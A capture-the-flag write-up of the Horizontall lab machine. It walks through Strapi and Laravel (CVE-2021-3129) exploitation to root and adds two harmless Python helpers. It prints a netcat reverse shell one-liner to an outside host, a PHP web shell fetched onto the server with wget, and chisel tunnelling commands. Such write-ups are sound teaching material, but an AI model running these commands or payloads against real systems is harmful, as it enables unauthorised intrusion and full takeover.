root💀muzec-sec:~#

Hack. Sleep. Repeat

We always start with an nmap scan.

nmap -p- --min-rate 10000 -oA nmap/allports -v IP
# Nmap 7.91 scan initiated Thu Dec 30 08:30:37 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.10.11.105
Warning: 10.10.11.105 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.11.105 from 320 to 640 due to 570 out of 1899 dropped probes since last increase.
Increasing send delay for 10.10.11.105 from 640 to 1000 due to 1398 out of 4658 dropped probes since last increase.
Nmap scan report for 10.10.11.105
Host is up (0.24s latency).
Not shown: 52107 closed ports, 13426 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Dec 30 08:31:48 2021 -- 1 IP address (1 host up) scanned in 70.64 seconds

Interesting, two open ports. Let's throw service detection and the default scripts at them to confirm what is running. We can already see it is SSH and HTTP, but let's keep it flashy lol.

nmap -sC -sV -oA nmap/normal -p 22,80 IP
# Nmap 7.91 scan initiated Thu Dec 30 08:32:40 2021 as: nmap -sC -sV -oA nmap/normal -p 22,80 10.10.11.105
Nmap scan report for horizontall.htb (10.10.11.105)
Host is up (0.35s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_  256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: horizontall
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 30 08:32:58 2021 -- 1 IP address (1 host up) scanned in 18.10 seconds

Now that is more flashy. We check HTTP first; make sure to add the IP and horizontall.htb to your hosts file.

image

The next thing to do is check the page source, but there is nothing there, so let's brute-force some directories and subdomains to find hidden pages.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]                                                                                                              
└─$ gobuster dir -u http://horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,html,bak,sh -o gobuster.req
/index.html           (Status: 200) [Size: 901]
/img                  (Status: 301) [Size: 194] [--> http://horizontall.htb/img/]
/css                  (Status: 301) [Size: 194] [--> http://horizontall.htb/css/]
/js                   (Status: 301) [Size: 194] [--> http://horizontall.htb/js/]

But I got nothing on the main domain, so let's check for subdomains.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt  
Found: api-prod.horizontall.htb (Status: 200) [Size: 413]

Boom, we got a subdomain, which is cool. Add it to the hosts file as well, then let's access it to see what's in store for us.

image

We got a welcome message and the rest is blank, so I tried adding /admin to the end of the subdomain (you could also brute-force directories and you would find it; I just guessed it) and boom, it works.

image

Seems we are dealing with Strapi CMS. I tried some default credentials with no luck, so let's see what we can find on Google.

http://api-prod.horizontall.htb/admin/strapiVersion

image

We found the version, so let's confirm whether it is vulnerable.

image

Boom, let's download the exploit and try it out.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ python3 50239.py http://api-prod.horizontall.htb/
[+] Checking Strapi CMS Version running
[+] Seems like the exploit will work!!!
[+] Executing exploit


[+] Password reset was successfully
[+] Your email is: admin@horizontall.htb
[+] Your new credentials are: admin:SuperStrongPassword1
[+] Your authenticated JSON Web Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQxMzAxNDYxLCJleHAiOjE2NDM4OTM0NjF9.50jv0hWWZ3KBCn-U0EIA2qNHkE7e4ddOrksf0yQuzbI


$> 
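The exploit hands us an admin JWT. As an added example (my own code, not from the write-up or the exploit script), here is how to decode its header and claims to see what the token actually grants and for how long; the token is the one printed above, and the signature is not verified because we do not hold the server's secret.

```python
import base64
import json

# Admin JWT copied from the exploit output above.
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjQxMzAxNDYxLCJleHAiOjE2NDM4OTM0NjF9."
         "50jv0hWWZ3KBCn-U0EIA2qNHkE7e4ddOrksf0yQuzbI")


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore the padding first.
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def decode_jwt_unverified(token: str) -> tuple:
    """Return (header, payload) of a JWT.
    The signature is NOT checked: this only reads what the token claims,
    it does not prove the token is genuine."""
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    payload = json.loads(_b64url_decode(payload_b64))
    return header, payload


def token_lifetime_days(payload: dict) -> float:
    """Lifetime in days between the iat and exp claims."""
    return (payload["exp"] - payload["iat"]) / 86400


if __name__ == "__main__":
    hdr, claims = decode_jwt_unverified(TOKEN)
    print("header :", hdr)
    print("claims :", claims)
    print("valid for %.0f days" % token_lifetime_days(claims))
```

The claims show isAdmin true and a 30-day lifetime; a stateless HS256 token like this stays usable until it expires unless the server-side secret is rotated, which is why rotating the JWT secret belongs in the cleanup after an incident like this.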

We are in, but when I try to run a command I get an error.

image

Smooth, let's try to send a shell back to our own machine instead.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 1337 >/tmp/f

Netcat is ready to catch the reverse shell.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ nc -nvlp 1337 
listening on [any] 1337 ...

image

Boom, much better. Let's spawn a full TTY shell.

image

Now let's grab user.txt first.

image

Boom. Now let's try to escalate our privileges.

image

Found some credentials, but when I tried them for the user developer I got no luck, so let's check for SUID binaries.

image

Nothing there either, so let's check what ports are listening locally on the box.

ss -tulpn

image
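To make explicit what that ss listing tells you, here is an added parser (my own example, not from the write-up) run over a constructed listing in the same shape as ss -tulpn output; it picks out the services bound to loopback only, which is exactly the kind of service an external nmap scan never sees but a foothold on the box can reach.

```python
import ipaddress
import re

# Constructed sample of `ss -tulpn` output (not the box's real listing):
# one service sits on 127.0.0.1:8000 and so never showed up in the nmap scan.
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.53%lo:53    0.0.0.0:*         users:(("systemd-resolve",pid=600,fd=12))
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=900,fd=3))
tcp   LISTEN 0      511    0.0.0.0:80          0.0.0.0:*         users:(("nginx",pid=950,fd=6),("nginx",pid=949,fd=6))
tcp   LISTEN 0      128    127.0.0.1:8000      0.0.0.0:*         users:(("php",pid=1234,fd=5))
tcp   LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=900,fd=4))
"""

PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')


def parse_ss(text: str) -> list:
    """Parse `ss -tulpn` lines into dicts: proto, addr, port, loopback, process, pid."""
    entries = []
    for line in text.splitlines()[1:]:            # skip the header row
        fields = line.split()
        if len(fields) < 6:
            continue
        addr, port = fields[4].rsplit(":", 1)      # "Local Address:Port" column
        addr = addr.split("%")[0].strip("[]")      # drop %iface suffix and IPv6 brackets
        loopback = addr != "*" and ipaddress.ip_address(addr).is_loopback
        m = PROC_RE.search(line)                   # missing when ss runs unprivileged
        entries.append({
            "proto": fields[0], "addr": addr, "port": int(port) if port.isdigit() else port,
            "loopback": loopback, "process": m.group(1) if m else None,
            "pid": int(m.group(2)) if m else None,
        })
    return entries


def loopback_only(entries: list) -> list:
    """Services reachable only from the host itself (or through a tunnel)."""
    return [e for e in entries if e["loopback"]]


if __name__ == "__main__":
    for e in loopback_only(parse_ss(SAMPLE_SS)):
        print(f'{e["proto"]} loopback-only :{e["port"]} -> {e["process"]} (pid {e["pid"]})')
```

Running the same parser over real ss output on a server is a quick way to inventory loopback-bound services that still need patching, since "not reachable from outside" stops being true the moment someone lands a shell on the box.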

Boom, we have a port. Let's forward it using chisel; first of all we need to transfer a copy of the chisel binary to the target.

image

Now let's start the chisel server on our attacking machine.

./chisel server -p 9000 --reverse &

image

Now on the target, connect back to it; this reverse-forwards the box's local port 8000 to port 9001 on our attacking machine.

./chisel client 10.10.14.7:9000 R:9001:127.0.0.1:8000 &

image

We are ready to access it now from our browser.

http://127.0.0.1:9001

image

Boom, we found Laravel v8 (PHP v7.4.18). Seems cool, let's confirm whether it is vulnerable.

image

Boom, jackpot. Let's give it a shot.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105/CVE-2021-3129]
└─$ python3 exploit.py
[*] Try to use monolog_rce1 for exploitation.
[*] Result:
uid=0(root) gid=0(root) groups=0(root)

[*] Try to use monolog_rce2 for exploitation.
[*] Result:
uid=0(root) gid=0(root) groups=0(root)

[*] Try to use monolog_rce3 for exploitation.
[*] Result:
[-] RCE echo is not found.

The exploit works, so now let's try to get a reverse shell. Let's edit the exploit to wget our shell file onto the server.

Save this as shell.php:

<?php system($_GET['cmd']); ?>

Now let's start our Python web server to host it.

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.105]
└─$ python -m SimpleHTTPServer                       
Serving HTTP on 0.0.0.0 port 8000 ...

image

Now let's save and run the exploit again.

image

Which confirms our file has been transferred. Let's verify it.

image

Flashy, right? hehehehehe Let's get a reverse shell back to our terminal now.

image

Bruhhhhhhhh, you just got yourself root. You are l33t, and thanks for reading my writeup. Peace out.

Greeting From Muzec


